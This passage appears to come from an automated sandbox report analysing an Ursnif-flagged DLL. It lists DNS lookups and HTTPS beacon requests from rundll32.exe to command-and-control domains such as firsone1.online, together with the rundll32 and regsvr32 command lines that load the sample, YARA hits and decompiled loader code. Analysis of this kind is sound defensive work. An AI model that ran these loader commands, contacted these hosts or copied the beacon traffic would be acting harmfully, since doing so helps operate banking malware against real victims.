                              Jan 6, 2022 11:52:32.089071035 CET192.168.2.38.8.8.80x9ee1Standard query (0)firsone1.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:34.447751045 CET192.168.2.38.8.8.80x8210Standard query (0)firsone1.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:35.159759045 CET192.168.2.38.8.8.80x247Standard query (0)firsone1.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:39.175417900 CET192.168.2.38.8.8.80xfb4Standard query (0)firsone1.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:53.208827972 CET192.168.2.38.8.8.80x3f32Standard query (0)kdsjdsadas.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:55.117465973 CET192.168.2.38.8.8.80xc96Standard query (0)kdsjdsadas.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:55.785442114 CET192.168.2.38.8.8.80x470aStandard query (0)kdsjdsadas.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:59.872992992 CET192.168.2.38.8.8.80x3b38Standard query (0)kdsjdsadas.onlineA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:13.779227018 CET192.168.2.38.8.8.80x352eStandard query (0)google.mail.comA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:15.196199894 CET192.168.2.38.8.8.80x6af6Standard query (0)google.mail.comA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:15.862837076 CET192.168.2.38.8.8.80xbb0bStandard query (0)google.mail.comA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:19.977394104 CET192.168.2.38.8.8.80x58faStandard query (0)google.mail.comA (IP address)IN (0x0001)

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                              Jan 6, 2022 11:51:11.899928093 CET8.8.8.8192.168.2.30x2428Name error (3)google.mail.comnonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:51:14.255937099 CET8.8.8.8192.168.2.30x1708Name error (3)google.mail.comnonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:51:15.000612974 CET8.8.8.8192.168.2.30x5506Name error (3)google.mail.comnonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:51:19.008183002 CET8.8.8.8192.168.2.30xb3aName error (3)google.mail.comnonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:32.159209967 CET8.8.8.8192.168.2.30x9ee1No error (0)firsone1.online134.0.117.195A (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:34.516730070 CET8.8.8.8192.168.2.30x8210No error (0)firsone1.online134.0.117.195A (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:35.227482080 CET8.8.8.8192.168.2.30x247No error (0)firsone1.online134.0.117.195A (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:39.194324017 CET8.8.8.8192.168.2.30xfb4No error (0)firsone1.online134.0.117.195A (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:53.233433962 CET8.8.8.8192.168.2.30x3f32Name error (3)kdsjdsadas.onlinenonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:55.136367083 CET8.8.8.8192.168.2.30xc96Name error (3)kdsjdsadas.onlinenonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:55.804541111 CET8.8.8.8192.168.2.30x470aName error (3)kdsjdsadas.onlinenonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:52:59.894037962 CET8.8.8.8192.168.2.30x3b38Name error (3)kdsjdsadas.onlinenonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:13.795664072 CET8.8.8.8192.168.2.30x352eName error (3)google.mail.comnonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:15.220105886 CET8.8.8.8192.168.2.30x6af6Name error (3)google.mail.comnonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:15.886075020 CET8.8.8.8192.168.2.30xbb0bName error (3)google.mail.comnonenoneA (IP address)IN (0x0001)
                              Jan 6, 2022 11:54:19.998173952 CET8.8.8.8192.168.2.30x58faName error (3)google.mail.comnonenoneA (IP address)IN (0x0001)

                              HTTP Request Dependency Graph

                              • firsone1.online

                              HTTPS Proxied Packets

                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              0192.168.2.349803134.0.117.195443C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              2022-01-06 10:52:33 UTC0OUTGET /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9inDS3N_2BAw6xzSFVI4I3r/K9MZrdcrj9/apJueAkO6z3aFPMvl/1u8BPeULfl0I/HXQ5umECQED/KqvCLcJ4CKU902/Ue_2BCWirDHmDgB_2FqvO/givATx4gqqgglwS7/v4BEhQLSTM_2B/_2Fe_2Bu.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:33 UTC0INHTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:39 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 460
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:33 UTC0INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 67 66 72 50 6b 4f 6a 59 44 2f 4c 63 57 69 72 55 51 5a 62 46 78 70 61 69 5f 32 42 78 38 76 2f 4e 37 76 44 5f 32 42 5f 32 46 48 35 75 45 7a 44 6f 56 76 2f 37 64 70 67 77 4f 42 69 75 58 48 71 4d 36 36 37 77 45 71 73 5f 32 2f 42 73 4b 68 49 54 4c 62 45 43 44 5f 32 2f 42 72 73 43 75 5a 4f 48 2f 39 69 6e
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/gfrPkOjYD/LcWirUQZbFxpai_2Bx8v/N7vD_2B_2FH5uEzDoVv/7dpgwOBiuXHqM667wEqs_2/BsKhITLbECD_2/BrsCuZOH/9in


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              1192.168.2.349811134.0.117.195443C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              2022-01-06 10:52:34 UTC1OUTGET /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a/AVLYw7N9qXQVRr8XS/UyotZ_2BKl95/LDReSgxNZCB/ot3ANBI_2Bmf2Z/wTO_2FRZveJAMYt1OAKW1/qd_2B_2BejnLQISw/xnKbO7DZ_2BFAtS/sbOL_2FiP79J/M.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:34 UTC1INHTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:41 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 437
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:34 UTC1INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 35 75 59 55 51 5f 32 46 51 4e 38 36 69 48 4e 59 34 39 4c 2f 44 50 5a 44 33 49 54 7a 6c 44 46 78 5f 32 46 4b 4e 63 6a 44 4f 68 2f 79 51 5a 57 76 4c 5f 32 42 73 5a 75 52 2f 48 6a 61 41 6f 67 34 47 2f 72 5f 32 42 30 4e 65 6e 67 33 62 53 53 62 6d 6f 46 49 6c 58 59 57 77 2f 4b 5a 66 4c 6f 35 41 71 39 61
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/5uYUQ_2FQN86iHNY49L/DPZD3ITzlDFx_2FKNcjDOh/yQZWvL_2BsZuR/HjaAog4G/r_2B0Neng3bSSbmoFIlXYWw/KZfLo5Aq9a


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              2192.168.2.349812134.0.117.195443C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              2022-01-06 10:52:35 UTC2OUTGET /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNBu0uT/PguFQeLj5VBY4GnMnUK/UA0cB1h_2F_2BMAAiPyhOY/5Iw7z41oIrnZb/4nW_2Ff2/TobIBfFnKF4Ggs861byzcAY/C9cxP76_2B/WGhxpkLq_2Fup2HWB/_2BU22RdSz/9MAm9.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:35 UTC2INHTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:42 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 449
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:35 UTC2INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 68 79 53 37 75 4e 6a 30 76 56 76 47 32 43 52 72 4c 62 5a 5a 34 2f 62 45 47 61 69 55 54 53 58 4c 6d 59 74 41 68 4d 2f 39 4b 72 4a 7a 6a 33 54 52 61 52 69 51 65 4d 2f 57 6a 62 6c 32 47 43 30 57 33 79 69 75 35 35 6d 37 58 2f 6b 65 54 56 48 5a 55 74 73 2f 30 56 64 65 78 56 48 42 49 44 6a 50 67 66 4e 42
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/hyS7uNj0vVvG2CRrLbZZ4/bEGaiUTSXLmYtAhM/9KrJzj3TRaRiQeM/Wjbl2GC0W3yiu55m7X/keTVHZUts/0VdexVHBIDjPgfNB


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              3192.168.2.349813134.0.117.195443C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              2022-01-06 10:52:39 UTC3OUTGET /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3qPwkGvjzy_2/FMNOIyI3KK/TIH3Ipp58a4osBqNi/vURpkVVskEDy/A_2BcLgra2r/_2BirjcwqYwgZh/tXOQJ7uW2wVdt9rR3elhH/xJqL8can/GFbQ.mki HTTP/1.1
                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                              Host: firsone1.online
                              Connection: Keep-Alive
                              Cache-Control: no-cache
                              2022-01-06 10:52:39 UTC3INHTTP/1.1 404 Not Found
                              Date: Thu, 06 Jan 2022 10:52:46 GMT
                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                              Content-Length: 424
                              Connection: close
                              Content-Type: text/html; charset=iso-8859-1
                              2022-01-06 10:52:39 UTC3INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6a 6b 6c 6f 6c 6c 2f 4d 36 50 68 37 58 56 4d 75 49 56 6e 51 4a 39 31 38 64 67 50 2f 69 47 79 35 5a 4e 4d 66 66 77 34 71 64 32 42 44 36 4e 77 2f 78 62 76 4b 4d 6c 7a 4a 74 43 36 58 4e 6f 77 62 64 5f 32 46 4b 6d 2f 55 6e 58 6e 5a 4e 4b 72 44 54 37 47 77 2f 33 59 57 72 71 47 51 5f 2f 32 42 69 52 70 45 59 64 6d 33 4c 33 71
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /jkloll/M6Ph7XVMuIVnQJ918dgP/iGy5ZNMffw4qd2BD6Nw/xbvKMlzJtC6XNowbd_2FKm/UnXnZNKrDT7Gw/3YWrqGQ_/2BiRpEYdm3L3q


                              Code Manipulations

                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              Analysis Process: loaddll32.exe PID: 4908 Parent PID: 720

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\System32\loaddll32.exe
                              Wow64 process (32bit):true
                              Commandline:loaddll32.exe "C:\Users\user\Desktop\9091.dll"
                              Imagebase:0xd70000
                              File size:116736 bytes
                              MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439767410.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439730823.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439792017.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.795901018.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.797295026.0000000002B69000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439887560.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439905362.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439867059.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.797510932.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439827039.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.439848821.0000000003288000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:moderate

                              Chronological Activities

                              Analysis Process: cmd.exe PID: 1364 Parent PID: 4908

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\cmd.exe
                              Wow64 process (32bit):true
                              Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                              Imagebase:0xd80000
                              File size:232960 bytes
                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high

                              Chronological Activities

                              Analysis Process: regsvr32.exe PID: 2332 Parent PID: 4908

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\regsvr32.exe
                              Wow64 process (32bit):true
                              Commandline:regsvr32.exe /s C:\Users\user\Desktop\9091.dll
                              Imagebase:0xaa0000
                              File size:20992 bytes
                              MD5 hash:426E7499F6A7346F0410DEAD0805586B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448462123.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448445867.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448406927.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448351506.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448474964.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.795928637.0000000000A80000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448483384.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.798351348.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.798052757.0000000004A99000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.798106316.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448428236.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.448381234.0000000005008000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:high

                              Chronological Activities

                              Analysis Process: rundll32.exe PID: 5032 Parent PID: 1364

                              General

                              Start time:11:50:55
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe "C:\Users\user\Desktop\9091.dll",#1
                              Imagebase:0xbe0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000002.798277282.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.797837616.00000000047E9000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438242726.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438346366.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438314861.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438169523.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438331806.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.798529500.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000002.797710008.0000000004400000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438296466.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438266295.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.438216608.0000000004E58000.00000004.00000040.sdmp, Author: Joe Security
                              Reputation:high

                              Chronological Activities

                              Analysis Process: rundll32.exe PID: 6008 Parent PID: 4908

                              General

                              Start time:11:50:56
                              Start date:06/01/2022
                              Path:C:\Windows\SysWOW64\rundll32.exe
                              Wow64 process (32bit):true
                              Commandline:rundll32.exe C:\Users\user\Desktop\9091.dll,DllRegisterServer
                              Imagebase:0xbe0000
                              File size:61952 bytes
                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433214839.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433186637.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433125624.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433150946.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433232382.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000002.798374776.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433256669.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433093104.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.796340255.0000000000BA0000.00000040.00000001.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.798181911.00000000046D9000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.433269351.0000000004D78000.00000004.00000040.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000005.00000002.798497438.0000000010000000.00000040.00020000.sdmp, Author: Joe Security
                              Reputation:high

                              Chronological Activities

                              Disassembly

                              Code Analysis

                              Reset < >

                                Analysis Process: loaddll32.exe PID: 4908 Parent PID: 720 loaddll32.exeCOMMON

                                Executed Functions

                                Function 10001E13, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 81filetimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 139 10001e13-10001e6a _aulldiv _snwprintf 141 10001e71-10001e8a 139->141 142 10001e6c 139->142 144 10001ed4-10001eda 141->144 145 10001e8c-10001e95 141->145 142->141 153 10001edc-10001ee2 144->153 146 10001ea5-10001eb3 MapViewOfFile 145->146 147 10001e97-10001e9e GetLastError 145->147 149 10001ec3-10001ec9 GetLastError 146->149 150 10001eb5-10001ec1 146->150 147->146 148 10001ea0-10001ea3 147->148 152 10001ecb-10001ed2 CloseHandle 148->152 149->152 149->153 150->153 152->153
                                C-Code - Quality: 69%
                                			E10001E13(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002160();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004144;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L1000215A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10004148, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                0x10001e13
                                0x10001e1c
                                0x10001e20
                                0x10001e26
                                0x10001e2b
                                0x10001e30
                                0x10001e33
                                0x10001e36
                                0x10001e3b
                                0x10001e3c
                                0x10001e3f
                                0x10001e4a
                                0x10001e51
                                0x10001e55
                                0x10001e57
                                0x10001e58
                                0x10001e5b
                                0x10001e60
                                0x10001e6a
                                0x10001e6c
                                0x10001e6c
                                0x10001e80
                                0x10001e86
                                0x10001e8a
                                0x10001eda
                                0x10001e8c
                                0x10001e95
                                0x10001eab
                                0x10001eb3
                                0x10001ec5
                                0x10001ec9
                                0x00000000
                                0x00000000
                                0x10001eb5
                                0x10001eb8
                                0x10001ebd
                                0x10001ebf
                                0x10001ebf
                                0x10001ea0
                                0x10001ea2
                                0x10001ecb
                                0x10001ecc
                                0x10001ecc
                                0x10001e95
                                0x10001ee2

                                APIs
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,10001713,0000000A,?,?), ref: 10001E20
                                • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001E36
                                • _snwprintf.NTDLL ref: 10001E5B
                                • CreateFileMappingW.KERNELBASE(000000FF,10004148,00000004,00000000,?,?), ref: 10001E80
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001713,0000000A,?), ref: 10001E97
